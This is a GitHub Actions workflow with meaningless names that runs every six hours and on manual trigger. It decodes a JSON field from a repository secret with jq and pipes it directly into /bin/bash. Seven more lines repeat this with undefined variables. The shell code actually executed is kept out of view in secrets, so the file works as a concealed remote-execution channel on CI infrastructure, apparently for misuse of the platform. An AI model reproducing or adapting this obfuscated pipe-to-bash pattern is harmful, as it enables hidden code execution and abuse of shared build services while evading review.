name: hubinyan2009

on:
  workflow_dispatch:
  schedule:
    - cron: '14 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: hubinyan2009
        env:
          ng92830: ${{ secrets.ng92830 }}
        run: |
          echo $ng92830 | jq -r .a80 | /bin/bash
          echo $nyuph16247 | jq -r .ngz62 | /bin/bash
          echo $ijgwi20944 | jq -r .gzwj23 | /bin/bash
          echo $cpclx64526 | jq -r .u3 | /bin/bash
          echo $qgzw331 | jq -r .owkhd7146 | /bin/bash
          echo $o48 | jq -r .it46007 | /bin/bash
          echo $j10 | jq -r .uwap3 | /bin/bash
          echo $nwkml14 | jq -r .yh412 | /bin/bash

